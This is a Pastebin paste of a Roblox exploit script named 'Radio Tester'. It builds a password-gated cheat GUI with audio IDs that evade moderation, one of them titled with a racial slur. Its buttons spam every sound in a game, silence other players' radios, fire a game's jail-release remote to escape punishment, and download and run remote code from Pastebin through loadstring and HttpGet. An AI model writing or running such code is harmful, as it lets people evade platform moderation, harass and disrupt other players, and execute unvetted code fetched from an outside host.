Advertisement
Hellotop2

Untitled

Jan 20th, 2019
196
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 22.77 KB | None | 0 0
  1. user = "OwnerLogin"
  2. pass = "v2"
  3. -- Objects
  4.  
  5. local RadioTesterGUI = Instance.new("ScreenGui")
  6. local Login = Instance.new("Frame")
  7. local ImageBackground = Instance.new("ImageLabel")
  8. local RadioTesterLogoText = Instance.new("TextLabel")
  9. local UserBox = Instance.new("TextBox")
  10. local PassBox = Instance.new("TextBox")
  11. local Enter = Instance.new("TextButton")
  12. local Top = Instance.new("Frame")
  13. local BackgroundFrame = Instance.new("Frame")
  14. local SideMenu = Instance.new("Frame")
  15. local bypassaudiosbutton = Instance.new("TextButton")
  16. local morebypassedaudiosbutton = Instance.new("TextButton")
  17. local scriptsbutton = Instance.new("TextButton")
  18. local bypassaudiosframe = Instance.new("Frame")
  19. local ScrollingFramebypassedaudios = Instance.new("ScrollingFrame")
  20. local ImageLabel = Instance.new("ImageLabel")
  21. local TextLabel = Instance.new("TextLabel")
  22. local TextLabel_2 = Instance.new("TextLabel")
  23. local TextLabel_3 = Instance.new("TextLabel")
  24. local TextLabel_4 = Instance.new("TextLabel")
  25. local ImageLabel_2 = Instance.new("ImageLabel")
  26. local ImageLabel_3 = Instance.new("ImageLabel")
  27. local ImageLabel_4 = Instance.new("ImageLabel")
  28. local TextLabel_5 = Instance.new("TextLabel")
  29. local ImageLabel_5 = Instance.new("ImageLabel")
  30. local TextLabel_6 = Instance.new("TextLabel")
  31. local ImageLabel_6 = Instance.new("ImageLabel")
  32. local morebypassedaudiosframe = Instance.new("Frame")
  33. local ScrollingFramemorebypassedaudios = Instance.new("ScrollingFrame")
  34. local ImageLabel_7 = Instance.new("ImageLabel")
  35. local TextLabel_7 = Instance.new("TextLabel")
  36. local ImageLabel_8 = Instance.new("ImageLabel")
  37. local TextLabel_8 = Instance.new("TextLabel")
  38. local TextLabel_9 = Instance.new("TextLabel")
  39. local ImageLabel_9 = Instance.new("ImageLabel")
  40. local TextLabel_10 = Instance.new("TextLabel")
  41. local scriptsframe = Instance.new("Frame")
  42. local StopRadios = Instance.new("TextButton")
  43. local FEAdmin = Instance.new("TextButton")
  44. local CrashRadios = Instance.new("TextButton")
  45. local unjailyourself = Instance.new("TextButton")
  46. local hidename = Instance.new("TextButton")
  47.  
  48. -- Properties
  49.  
  50. RadioTesterGUI.Name = "RadioTesterGUI"
  51. RadioTesterGUI.Parent = game.CoreGui
  52. RadioTesterGUI.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  53.  
  54. Login.Name = "Login"
  55. Login.Parent = RadioTesterGUI
  56. Login.BackgroundColor3 = Color3.new(0.282353, 0.282353, 0.282353)
  57. Login.BorderSizePixel = 0
  58. Login.Position = UDim2.new(0.414201975, 0, 0.271663725, 0)
  59. Login.Size = UDim2.new(0, 317, 0, 412)
  60. Login.Visible = true
  61.  
  62. ImageBackground.Name = "ImageBackground"
  63. ImageBackground.Parent = Login
  64. ImageBackground.BackgroundTransparency = 1
  65. ImageBackground.BorderSizePixel = 0
  66. ImageBackground.Position = UDim2.new(0.312302858, 0, 0.0655339807, 0)
  67. ImageBackground.Size = UDim2.new(0, 119, 0, 116)
  68. ImageBackground.Image = "rbxassetid://1308002435"
  69. ImageBackground.ScaleType = Enum.ScaleType.Slice
  70. ImageBackground.SliceCenter = Rect.new(55, 55, 201, 201)
  71.  
  72. RadioTesterLogoText.Name = "RadioTesterLogoText"
  73. RadioTesterLogoText.Parent = ImageBackground
  74. RadioTesterLogoText.BackgroundColor3 = Color3.new(1, 1, 1)
  75. RadioTesterLogoText.BackgroundTransparency = 1
  76. RadioTesterLogoText.Position = UDim2.new(0, 0, 0.0862068981, 0)
  77. RadioTesterLogoText.Size = UDim2.new(0, 117, 0, 96)
  78. RadioTesterLogoText.Font = Enum.Font.SourceSansLight
  79. RadioTesterLogoText.Text = "Radio Tester"
  80. RadioTesterLogoText.TextColor3 = Color3.new(0, 0, 0)
  81. RadioTesterLogoText.TextScaled = true
  82. RadioTesterLogoText.TextSize = 14
  83. RadioTesterLogoText.TextWrapped = true
  84.  
  85. UserBox.Name = "UserBox"
  86. UserBox.Parent = Login
  87. UserBox.BackgroundColor3 = Color3.new(0, 1, 0.498039)
  88. UserBox.BorderSizePixel = 0
  89. UserBox.Position = UDim2.new(0.151419565, 0, 0.388349503, 0)
  90. UserBox.Size = UDim2.new(0, 227, 0, 50)
  91. UserBox.Font = Enum.Font.SourceSansLight
  92. UserBox.PlaceholderColor3 = Color3.new(0, 0, 0)
  93. UserBox.PlaceholderText = "Username"
  94. UserBox.Text = "Username"
  95. UserBox.TextColor3 = Color3.new(0, 0, 0)
  96. UserBox.TextScaled = true
  97. UserBox.TextSize = 14
  98. UserBox.TextWrapped = true
  99. UserBox.TextXAlignment = Enum.TextXAlignment.Left
  100.  
  101. PassBox.Name = "PassBox"
  102. PassBox.Parent = Login
  103. PassBox.BackgroundColor3 = Color3.new(0, 1, 0.498039)
  104. PassBox.BorderSizePixel = 0
  105. PassBox.Position = UDim2.new(0.151419565, 0, 0.587378621, 0)
  106. PassBox.Size = UDim2.new(0, 227, 0, 50)
  107. PassBox.Font = Enum.Font.SourceSansLight
  108. PassBox.PlaceholderColor3 = Color3.new(0, 0, 0)
  109. PassBox.PlaceholderText = "Password"
  110. PassBox.Text = "Password"
  111. PassBox.TextColor3 = Color3.new(0, 0, 0)
  112. PassBox.TextScaled = true
  113. PassBox.TextSize = 14
  114. PassBox.TextWrapped = true
  115. PassBox.TextXAlignment = Enum.TextXAlignment.Left
  116.  
  117. Enter.Name = "Enter"
  118. Enter.Parent = Login
  119. Enter.BackgroundColor3 = Color3.new(1, 1, 1)
  120. Enter.BorderSizePixel = 0
  121. Enter.Position = UDim2.new(0.182965294, 0, 0.766990304, 0)
  122. Enter.Size = UDim2.new(0, 200, 0, 50)
  123. Enter.Font = Enum.Font.SourceSansLight
  124. Enter.Text = "Login"
  125. Enter.TextColor3 = Color3.new(0, 0, 0)
  126. Enter.TextScaled = true
  127. Enter.TextSize = 14
  128. Enter.TextWrapped = true
  129.  
  130. Top.Name = "Top"
  131. Top.Parent = RadioTesterGUI
  132. Top.BackgroundColor3 = Color3.new(0, 0, 0)
  133. Top.BorderSizePixel = 0
  134. Top.Position = UDim2.new(0.0969962627, 0, 0.0701970235, 0)
  135. Top.Size = UDim2.new(0, 528, 0, 40)
  136. Top.Visible = false
  137.  
  138. BackgroundFrame.Name = "BackgroundFrame"
  139. BackgroundFrame.Parent = Top
  140. BackgroundFrame.BackgroundColor3 = Color3.new(0.168627, 0.168627, 0.168627)
  141. BackgroundFrame.BorderSizePixel = 0
  142. BackgroundFrame.Position = UDim2.new(0.0986349434, 0, 0.975000203, 0)
  143. BackgroundFrame.Size = UDim2.new(0, 476, 0, 269)
  144.  
  145. SideMenu.Name = "SideMenu"
  146. SideMenu.Parent = Top
  147. SideMenu.BackgroundColor3 = Color3.new(0.0862745, 0.0862745, 0.0862745)
  148. SideMenu.BorderSizePixel = 0
  149. SideMenu.Position = UDim2.new(0, 0, 0.975000381, 0)
  150. SideMenu.Size = UDim2.new(0, 73, 0, 269)
  151.  
  152. bypassaudiosbutton.Name = "bypassaudiosbutton"
  153. bypassaudiosbutton.Parent = SideMenu
  154. bypassaudiosbutton.BackgroundColor3 = Color3.new(1, 1, 1)
  155. bypassaudiosbutton.BorderSizePixel = 0
  156. bypassaudiosbutton.Size = UDim2.new(0, 73, 0, 33)
  157. bypassaudiosbutton.Font = Enum.Font.SourceSans
  158. bypassaudiosbutton.Text = "Bypassed Audios"
  159. bypassaudiosbutton.TextColor3 = Color3.new(0, 0, 0)
  160. bypassaudiosbutton.TextScaled = true
  161. bypassaudiosbutton.TextSize = 14
  162. bypassaudiosbutton.TextWrapped = true
  163.  
  164. morebypassedaudiosbutton.Name = "morebypassedaudiosbutton"
  165. morebypassedaudiosbutton.Parent = SideMenu
  166. morebypassedaudiosbutton.BackgroundColor3 = Color3.new(1, 1, 1)
  167. morebypassedaudiosbutton.BorderSizePixel = 0
  168. morebypassedaudiosbutton.Position = UDim2.new(0, 0, 0.185873613, 0)
  169. morebypassedaudiosbutton.Size = UDim2.new(0, 73, 0, 33)
  170. morebypassedaudiosbutton.Font = Enum.Font.SourceSans
  171. morebypassedaudiosbutton.Text = "Bypassed Audios"
  172. morebypassedaudiosbutton.TextColor3 = Color3.new(0, 0, 0)
  173. morebypassedaudiosbutton.TextScaled = true
  174. morebypassedaudiosbutton.TextSize = 14
  175. morebypassedaudiosbutton.TextWrapped = true
  176.  
  177. scriptsbutton.Name = "scriptsbutton"
  178. scriptsbutton.Parent = SideMenu
  179. scriptsbutton.BackgroundColor3 = Color3.new(1, 1, 1)
  180. scriptsbutton.BorderSizePixel = 0
  181. scriptsbutton.Position = UDim2.new(0, 0, 0.382899642, 0)
  182. scriptsbutton.Size = UDim2.new(0, 73, 0, 33)
  183. scriptsbutton.Font = Enum.Font.SourceSans
  184. scriptsbutton.Text = "Scripts"
  185. scriptsbutton.TextColor3 = Color3.new(0, 0, 0)
  186. scriptsbutton.TextScaled = true
  187. scriptsbutton.TextSize = 14
  188. scriptsbutton.TextWrapped = true
  189.  
  190. bypassaudiosframe.Name = "bypassaudiosframe"
  191. bypassaudiosframe.Parent = Top
  192. bypassaudiosframe.BackgroundColor3 = Color3.new(0.168627, 0.168627, 0.168627)
  193. bypassaudiosframe.BorderSizePixel = 0
  194. bypassaudiosframe.Position = UDim2.new(0.138257578, 0, 0.975000381, 0)
  195. bypassaudiosframe.Size = UDim2.new(0, 455, 0, 269)
  196. bypassaudiosframe.Visible = false
  197. bypassaudiosframe.ZIndex = 2
  198.  
  199. ScrollingFramebypassedaudios.Name = "ScrollingFramebypassedaudios"
  200. ScrollingFramebypassedaudios.Parent = bypassaudiosframe
  201. ScrollingFramebypassedaudios.BackgroundColor3 = Color3.new(0.168627, 0.168627, 0.168627)
  202. ScrollingFramebypassedaudios.Size = UDim2.new(0, 455, 0, 269)
  203.  
  204. ImageLabel.Parent = ScrollingFramebypassedaudios
  205. ImageLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  206. ImageLabel.BackgroundTransparency = 1
  207. ImageLabel.Size = UDim2.new(0, 113, 0, 106)
  208. ImageLabel.ZIndex = 5
  209. ImageLabel.Image = "rbxassetid://337002392"
  210.  
  211. TextLabel.Parent = ScrollingFramebypassedaudios
  212. TextLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  213. TextLabel.BackgroundTransparency = 1
  214. TextLabel.Position = UDim2.new(0.248351648, 0, 0.551346481, 0)
  215. TextLabel.Size = UDim2.new(0, 306, 0, 59)
  216. TextLabel.ZIndex = 5
  217. TextLabel.Font = Enum.Font.SourceSansLight
  218. TextLabel.Text = "644263651\nKfc ASMR Loud\n"
  219. TextLabel.TextColor3 = Color3.new(1, 1, 1)
  220. TextLabel.TextScaled = true
  221. TextLabel.TextSize = 14
  222. TextLabel.TextWrapped = true
  223. TextLabel.TextXAlignment = Enum.TextXAlignment.Left
  224.  
  225. TextLabel_2.Parent = ScrollingFramebypassedaudios
  226. TextLabel_2.BackgroundColor3 = Color3.new(1, 1, 1)
  227. TextLabel_2.BackgroundTransparency = 1
  228. TextLabel_2.Position = UDim2.new(0.248351648, 0, 0.218632713, 0)
  229. TextLabel_2.Size = UDim2.new(0, 306, 0, 78)
  230. TextLabel_2.ZIndex = 5
  231. TextLabel_2.Font = Enum.Font.SourceSansLight
  232. TextLabel_2.Text = "2111590082\nbeat my\n"
  233. TextLabel_2.TextColor3 = Color3.new(1, 1, 1)
  234. TextLabel_2.TextScaled = true
  235. TextLabel_2.TextSize = 14
  236. TextLabel_2.TextWrapped = true
  237. TextLabel_2.TextXAlignment = Enum.TextXAlignment.Left
  238.  
  239. TextLabel_3.Parent = ScrollingFramebypassedaudios
  240. TextLabel_3.BackgroundColor3 = Color3.new(1, 1, 1)
  241. TextLabel_3.BackgroundTransparency = 1
  242. TextLabel_3.Position = UDim2.new(0.248351648, 0, 0.378484011, 0)
  243. TextLabel_3.Size = UDim2.new(0, 306, 0, 59)
  244. TextLabel_3.ZIndex = 5
  245. TextLabel_3.Font = Enum.Font.SourceSansLight
  246. TextLabel_3.Text = "172899166\nEnebus Earrape"
  247. TextLabel_3.TextColor3 = Color3.new(1, 1, 1)
  248. TextLabel_3.TextScaled = true
  249. TextLabel_3.TextSize = 14
  250. TextLabel_3.TextWrapped = true
  251. TextLabel_3.TextXAlignment = Enum.TextXAlignment.Left
  252.  
  253. TextLabel_4.Parent = ScrollingFramebypassedaudios
  254. TextLabel_4.BackgroundColor3 = Color3.new(1, 1, 1)
  255. TextLabel_4.BackgroundTransparency = 1
  256. TextLabel_4.Position = UDim2.new(0.248351648, 0, 0.0513464734, 0)
  257. TextLabel_4.Size = UDim2.new(0, 306, 0, 78)
  258. TextLabel_4.ZIndex = 5
  259. TextLabel_4.Font = Enum.Font.SourceSansLight
  260. TextLabel_4.Text = "425658241\nKazoo Kid EARRAPE\n"
  261. TextLabel_4.TextColor3 = Color3.new(1, 1, 1)
  262. TextLabel_4.TextScaled = true
  263. TextLabel_4.TextSize = 14
  264. TextLabel_4.TextWrapped = true
  265. TextLabel_4.TextXAlignment = Enum.TextXAlignment.Left
  266.  
  267. ImageLabel_2.Parent = ScrollingFramebypassedaudios
  268. ImageLabel_2.BackgroundColor3 = Color3.new(1, 1, 1)
  269. ImageLabel_2.BackgroundTransparency = 1
  270. ImageLabel_2.Position = UDim2.new(0, 0, 0.32713756, 0)
  271. ImageLabel_2.Size = UDim2.new(0, 113, 0, 106)
  272. ImageLabel_2.ZIndex = 5
  273. ImageLabel_2.Image = "rbxassetid://337002392"
  274.  
  275. ImageLabel_3.Parent = ScrollingFramebypassedaudios
  276. ImageLabel_3.BackgroundColor3 = Color3.new(1, 1, 1)
  277. ImageLabel_3.BackgroundTransparency = 1
  278. ImageLabel_3.Position = UDim2.new(0, 0, 0.167286247, 0)
  279. ImageLabel_3.Size = UDim2.new(0, 113, 0, 106)
  280. ImageLabel_3.ZIndex = 5
  281. ImageLabel_3.Image = "rbxassetid://337002392"
  282.  
  283. ImageLabel_4.Parent = ScrollingFramebypassedaudios
  284. ImageLabel_4.BackgroundColor3 = Color3.new(1, 1, 1)
  285. ImageLabel_4.BackgroundTransparency = 1
  286. ImageLabel_4.Position = UDim2.new(0, 0, 0.5, 0)
  287. ImageLabel_4.Size = UDim2.new(0, 113, 0, 106)
  288. ImageLabel_4.ZIndex = 5
  289. ImageLabel_4.Image = "rbxassetid://337002392"
  290.  
  291. TextLabel_5.Parent = ScrollingFramebypassedaudios
  292. TextLabel_5.BackgroundColor3 = Color3.new(1, 1, 1)
  293. TextLabel_5.BackgroundTransparency = 1
  294. TextLabel_5.Position = UDim2.new(0.246153846, 0, 0.711197793, 0)
  295. TextLabel_5.Size = UDim2.new(0, 306, 0, 59)
  296. TextLabel_5.ZIndex = 5
  297. TextLabel_5.Font = Enum.Font.SourceSansLight
  298. TextLabel_5.Text = "2502638589\nDefault Dance Loud\n"
  299. TextLabel_5.TextColor3 = Color3.new(1, 1, 1)
  300. TextLabel_5.TextScaled = true
  301. TextLabel_5.TextSize = 14
  302. TextLabel_5.TextWrapped = true
  303. TextLabel_5.TextXAlignment = Enum.TextXAlignment.Left
  304.  
  305. ImageLabel_5.Parent = ScrollingFramebypassedaudios
  306. ImageLabel_5.BackgroundColor3 = Color3.new(1, 1, 1)
  307. ImageLabel_5.BackgroundTransparency = 1
  308. ImageLabel_5.Position = UDim2.new(-0.0021978023, 0, 0.659851313, 0)
  309. ImageLabel_5.Size = UDim2.new(0, 113, 0, 106)
  310. ImageLabel_5.ZIndex = 5
  311. ImageLabel_5.Image = "rbxassetid://337002392"
  312.  
  313. TextLabel_6.Parent = ScrollingFramebypassedaudios
  314. TextLabel_6.BackgroundColor3 = Color3.new(1, 1, 1)
  315. TextLabel_6.BackgroundTransparency = 1
  316. TextLabel_6.Position = UDim2.new(0.248351648, 0, 0.854320467, 0)
  317. TextLabel_6.Size = UDim2.new(0, 306, 0, 59)
  318. TextLabel_6.ZIndex = 5
  319. TextLabel_6.Font = Enum.Font.SourceSansLight
  320. TextLabel_6.Text = "2466291217\nMario Nigger\n"
  321. TextLabel_6.TextColor3 = Color3.new(1, 1, 1)
  322. TextLabel_6.TextScaled = true
  323. TextLabel_6.TextSize = 14
  324. TextLabel_6.TextWrapped = true
  325. TextLabel_6.TextXAlignment = Enum.TextXAlignment.Left
  326.  
  327. ImageLabel_6.Parent = ScrollingFramebypassedaudios
  328. ImageLabel_6.BackgroundColor3 = Color3.new(1, 1, 1)
  329. ImageLabel_6.BackgroundTransparency = 1
  330. ImageLabel_6.Position = UDim2.new(0, 0, 0.802973986, 0)
  331. ImageLabel_6.Size = UDim2.new(0, 113, 0, 106)
  332. ImageLabel_6.ZIndex = 5
  333. ImageLabel_6.Image = "rbxassetid://337002392"
  334.  
  335. morebypassedaudiosframe.Name = "morebypassedaudiosframe"
  336. morebypassedaudiosframe.Parent = Top
  337. morebypassedaudiosframe.BackgroundColor3 = Color3.new(0.168627, 0.168627, 0.168627)
  338. morebypassedaudiosframe.BorderSizePixel = 0
  339. morebypassedaudiosframe.Position = UDim2.new(0.138257578, 0, 0.975000381, 0)
  340. morebypassedaudiosframe.Size = UDim2.new(0, 455, 0, 269)
  341. morebypassedaudiosframe.Visible = false
  342. morebypassedaudiosframe.ZIndex = 2
  343.  
  344. ScrollingFramemorebypassedaudios.Name = "ScrollingFramemorebypassedaudios"
  345. ScrollingFramemorebypassedaudios.Parent = morebypassedaudiosframe
  346. ScrollingFramemorebypassedaudios.BackgroundColor3 = Color3.new(0.168627, 0.168627, 0.168627)
  347. ScrollingFramemorebypassedaudios.Size = UDim2.new(0, 455, 0, 269)
  348.  
  349. ImageLabel_7.Parent = ScrollingFramemorebypassedaudios
  350. ImageLabel_7.BackgroundColor3 = Color3.new(1, 1, 1)
  351. ImageLabel_7.BackgroundTransparency = 1
  352. ImageLabel_7.Size = UDim2.new(0, 113, 0, 106)
  353. ImageLabel_7.ZIndex = 5
  354. ImageLabel_7.Image = "rbxassetid://337002392"
  355.  
  356. TextLabel_7.Parent = ScrollingFramemorebypassedaudios
  357. TextLabel_7.BackgroundColor3 = Color3.new(1, 1, 1)
  358. TextLabel_7.BackgroundTransparency = 1
  359. TextLabel_7.Position = UDim2.new(0.248351648, 0, 0.0513464734, 0)
  360. TextLabel_7.Size = UDim2.new(0, 306, 0, 78)
  361. TextLabel_7.ZIndex = 5
  362. TextLabel_7.Font = Enum.Font.SourceSansLight
  363. TextLabel_7.Text = "2249867830\nFBI Open up LOUD\n"
  364. TextLabel_7.TextColor3 = Color3.new(1, 1, 1)
  365. TextLabel_7.TextScaled = true
  366. TextLabel_7.TextSize = 14
  367. TextLabel_7.TextWrapped = true
  368. TextLabel_7.TextXAlignment = Enum.TextXAlignment.Left
  369.  
  370. ImageLabel_8.Parent = ScrollingFramemorebypassedaudios
  371. ImageLabel_8.BackgroundColor3 = Color3.new(1, 1, 1)
  372. ImageLabel_8.BackgroundTransparency = 1
  373. ImageLabel_8.Position = UDim2.new(0, 0, 0.150557622, 0)
  374. ImageLabel_8.Size = UDim2.new(0, 113, 0, 106)
  375. ImageLabel_8.ZIndex = 5
  376. ImageLabel_8.Image = "rbxassetid://337002392"
  377.  
  378. TextLabel_8.Parent = ScrollingFramemorebypassedaudios
  379. TextLabel_8.BackgroundColor3 = Color3.new(1, 1, 1)
  380. TextLabel_8.BackgroundTransparency = 1
  381. TextLabel_8.Position = UDim2.new(0.248351648, 0, 0.201904088, 0)
  382. TextLabel_8.Size = UDim2.new(0, 306, 0, 78)
  383. TextLabel_8.ZIndex = 5
  384. TextLabel_8.Font = Enum.Font.SourceSansLight
  385. TextLabel_8.Text = "1949839048\nDefalt Dance Despacito"
  386. TextLabel_8.TextColor3 = Color3.new(1, 1, 1)
  387. TextLabel_8.TextScaled = true
  388. TextLabel_8.TextSize = 14
  389. TextLabel_8.TextWrapped = true
  390. TextLabel_8.TextXAlignment = Enum.TextXAlignment.Left
  391.  
  392. TextLabel_9.Parent = ScrollingFramemorebypassedaudios
  393. TextLabel_9.BackgroundColor3 = Color3.new(1, 1, 1)
  394. TextLabel_9.BackgroundTransparency = 1
  395. TextLabel_9.Position = UDim2.new(0.248351648, 0, 0.400788844, 0)
  396. TextLabel_9.Size = UDim2.new(0, 306, 0, 78)
  397. TextLabel_9.ZIndex = 5
  398. TextLabel_9.Font = Enum.Font.SourceSansLight
  399. TextLabel_9.Text = "405835873\nIts raining tix Loud"
  400. TextLabel_9.TextColor3 = Color3.new(1, 1, 1)
  401. TextLabel_9.TextScaled = true
  402. TextLabel_9.TextSize = 14
  403. TextLabel_9.TextWrapped = true
  404. TextLabel_9.TextXAlignment = Enum.TextXAlignment.Left
  405.  
  406. ImageLabel_9.Parent = ScrollingFramemorebypassedaudios
  407. ImageLabel_9.BackgroundColor3 = Color3.new(1, 1, 1)
  408. ImageLabel_9.BackgroundTransparency = 1
  409. ImageLabel_9.Position = UDim2.new(0, 0, 0.349442363, 0)
  410. ImageLabel_9.Size = UDim2.new(0, 113, 0, 106)
  411. ImageLabel_9.ZIndex = 5
  412. ImageLabel_9.Image = "rbxassetid://337002392"
  413.  
  414. TextLabel_10.Parent = ScrollingFramemorebypassedaudios
  415. TextLabel_10.BackgroundColor3 = Color3.new(1, 1, 1)
  416. TextLabel_10.BackgroundTransparency = 1
  417. TextLabel_10.Position = UDim2.new(0.157890111, 0, 0.612408996, 0)
  418. TextLabel_10.Size = UDim2.new(0, 311, 0, 50)
  419. TextLabel_10.ZIndex = 7
  420. TextLabel_10.Font = Enum.Font.SourceSansLight
  421. TextLabel_10.Text = "Want more? Go to http://tinyurl.com/robloxbypassedaudios."
  422. TextLabel_10.TextColor3 = Color3.new(1, 1, 1)
  423. TextLabel_10.TextScaled = true
  424. TextLabel_10.TextSize = 14
  425. TextLabel_10.TextWrapped = true
  426.  
  427. scriptsframe.Name = "scriptsframe"
  428. scriptsframe.Parent = Top
  429. scriptsframe.BackgroundColor3 = Color3.new(0.168627, 0.168627, 0.168627)
  430. scriptsframe.BorderSizePixel = 0
  431. scriptsframe.Position = UDim2.new(0.138257578, 0, 0.975000381, 0)
  432. scriptsframe.Size = UDim2.new(0, 455, 0, 269)
  433. scriptsframe.ZIndex = 6
  434. scriptsframe.Visible = false
  435.  
  436. StopRadios.Name = "StopRadios"
  437. StopRadios.Parent = scriptsframe
  438. StopRadios.BackgroundColor3 = Color3.new(0.133333, 0.133333, 0.133333)
  439. StopRadios.BorderSizePixel = 0
  440. StopRadios.Position = UDim2.new(0.0373626389, 0, 0.0334572494, 0)
  441. StopRadios.Size = UDim2.new(0, 180, 0, 50)
  442. StopRadios.ZIndex = 7
  443. StopRadios.Font = Enum.Font.SourceSansSemibold
  444. StopRadios.Text = "Stop radios."
  445. StopRadios.TextColor3 = Color3.new(1, 1, 1)
  446. StopRadios.TextScaled = true
  447. StopRadios.TextSize = 14
  448. StopRadios.TextWrapped = true
  449.  
  450. FEAdmin.Name = "FEAdmin"
  451. FEAdmin.Parent = scriptsframe
  452. FEAdmin.BackgroundColor3 = Color3.new(0.133333, 0.133333, 0.133333)
  453. FEAdmin.BorderSizePixel = 0
  454. FEAdmin.Position = UDim2.new(0.512087941, 0, 0.0334572494, 0)
  455. FEAdmin.Size = UDim2.new(0, 180, 0, 50)
  456. FEAdmin.ZIndex = 7
  457. FEAdmin.Font = Enum.Font.SourceSansSemibold
  458. FEAdmin.Text = "FE Admin"
  459. FEAdmin.TextColor3 = Color3.new(1, 1, 1)
  460. FEAdmin.TextScaled = true
  461. FEAdmin.TextSize = 14
  462. FEAdmin.TextWrapped = true
  463.  
  464. CrashRadios.Name = "CrashRadios"
  465. CrashRadios.Parent = scriptsframe
  466. CrashRadios.BackgroundColor3 = Color3.new(0.133333, 0.133333, 0.133333)
  467. CrashRadios.BorderSizePixel = 0
  468. CrashRadios.Position = UDim2.new(0.0351648629, 0, 0.286245346, 0)
  469. CrashRadios.Size = UDim2.new(0, 180, 0, 50)
  470. CrashRadios.ZIndex = 7
  471. CrashRadios.Font = Enum.Font.SourceSansSemibold
  472. CrashRadios.Text = "Crash radios."
  473. CrashRadios.TextColor3 = Color3.new(1, 1, 1)
  474. CrashRadios.TextScaled = true
  475. CrashRadios.TextSize = 14
  476. CrashRadios.TextWrapped = true
  477.  
  478. unjailyourself.Name = "unjailyourself"
  479. unjailyourself.Parent = scriptsframe
  480. unjailyourself.BackgroundColor3 = Color3.new(0.133333, 0.133333, 0.133333)
  481. unjailyourself.BorderSizePixel = 0
  482. unjailyourself.Position = UDim2.new(0.512087941, 0, 0.286245346, 0)
  483. unjailyourself.Size = UDim2.new(0, 180, 0, 50)
  484. unjailyourself.ZIndex = 7
  485. unjailyourself.Font = Enum.Font.SourceSansSemibold
  486. unjailyourself.Text = "Unjail yourself"
  487. unjailyourself.TextColor3 = Color3.new(1, 1, 1)
  488. unjailyourself.TextScaled = true
  489. unjailyourself.TextSize = 14
  490. unjailyourself.TextWrapped = true
  491.  
  492. hidename.Name = "hidename"
  493. hidename.Parent = scriptsframe
  494. hidename.BackgroundColor3 = Color3.new(0.133333, 0.133333, 0.133333)
  495. hidename.BorderSizePixel = 0
  496. hidename.Position = UDim2.new(0.0351648629, 0, 0.527881026, 0)
  497. hidename.Size = UDim2.new(0, 180, 0, 50)
  498. hidename.ZIndex = 7
  499. hidename.Font = Enum.Font.SourceSansSemibold
  500. hidename.Text = "Hide name above."
  501. hidename.TextColor3 = Color3.new(1, 1, 1)
  502. hidename.TextScaled = true
  503. hidename.TextSize = 14
  504. hidename.TextWrapped = true
  505. Enter.MouseButton1Click:Connect(function()
  506. if UserBox.Text == user and PassBox.Text == pass then
  507. Login.Visible = false
  508. Top.Visible = true
  509. else
  510. Enter.Text = "Incorrect"
  511. wait(2)
  512. Enter.Text = "Login"
  513. end
  514. end)
  515. local UserInputService,gui,dragging,dragInput,dragStart,startPos = game:GetService("UserInputService"),Top
  516.  
  517. local function update(input)
  518. local delta = input.Position - dragStart
  519. wait(0.1)
  520. gui.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
  521. end
  522.  
  523. gui.InputBegan:Connect(function(input)
  524. if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
  525. dragging = true
  526. dragStart = input.Position
  527. startPos = gui.Position
  528.  
  529. input.Changed:Connect(function()
  530. if input.UserInputState == Enum.UserInputState.End then
  531. dragging = false
  532. end
  533. end)
  534. end
  535. end)
  536.  
  537. gui.InputChanged:Connect(function(input)
  538. if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
  539. dragInput = input
  540. end
  541. end)
  542.  
  543. UserInputService.InputChanged:Connect(function(input)
  544. if input == dragInput and dragging then
  545. update(input)
  546. end
  547. end)
  548. bypassaudiosbutton.MouseButton1Click:Connect(function()
  549. bypassaudiosframe.Visible = true
  550. morebypassedaudiosframe.Visible = false
  551. scriptsframe.Visible = false
  552. end)
  553. morebypassedaudiosbutton.MouseButton1Click:Connect(function()
  554. bypassaudiosframe.Visible = false
  555. morebypassedaudiosframe.Visible = true
  556. scriptsframe.Visible = false
  557. end)
  558. scriptsbutton.MouseButton1Click:Connect(function()
  559. bypassaudiosframe.Visible = false
  560. morebypassedaudiosframe.Visible = false
  561. scriptsframe.Visible = true
  562. end)
  563. CrashRadios.MouseButton1Click:Connect(function()
  564. local sounds = { }
  565. local recurse
  566. function recurse(instance)
  567. if instance:IsA "Sound" then
  568. sounds[#sounds + 1] = instance
  569. end
  570. for _, child in ipairs (instance:GetChildren()) do
  571. recurse(child)
  572. end
  573. end
  574. recurse(game)
  575. game.DescendantAdded:connect(recurse)
  576. spawn(function()
  577. while true do
  578. game:GetService "RunService".RenderStepped:wait()
  579. for _, sound in ipairs (sounds) do
  580. sound:Play()
  581. end
  582. end
  583. end)
  584. end)
  585. StopRadios.MouseButton1Click:Connect(function()
  586. for i,v in pairs(game.Players:GetChildren()) do
  587. if v.Name ~= game.Players.LocalPlayer.Name then
  588. for x,d in pairs(game.Workspace[v.Name]:GetChildren()) do
  589. if d:IsA("Tool") then
  590. d.Handle.Sound.Playing = false
  591. end
  592. end
  593. end
  594. end
  595. end)
  596. FEAdmin.MouseButton1Click:Connect(function()
  597. loadstring(game:HttpGet("https://pastebin.com/raw/XbUvhxnh",true))()
  598. end)
  599. unjailyourself.MouseButton1Click:Connect(function()
  600. game.ReplicatedStorage.ReleaseEvent:FireServer()
  601. end)
  602. hidename.MouseButton1Click:Connect(function()
  603. game.Players.LocalPlayer.Character.Head.Title:ClearAllChildren()
  604. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement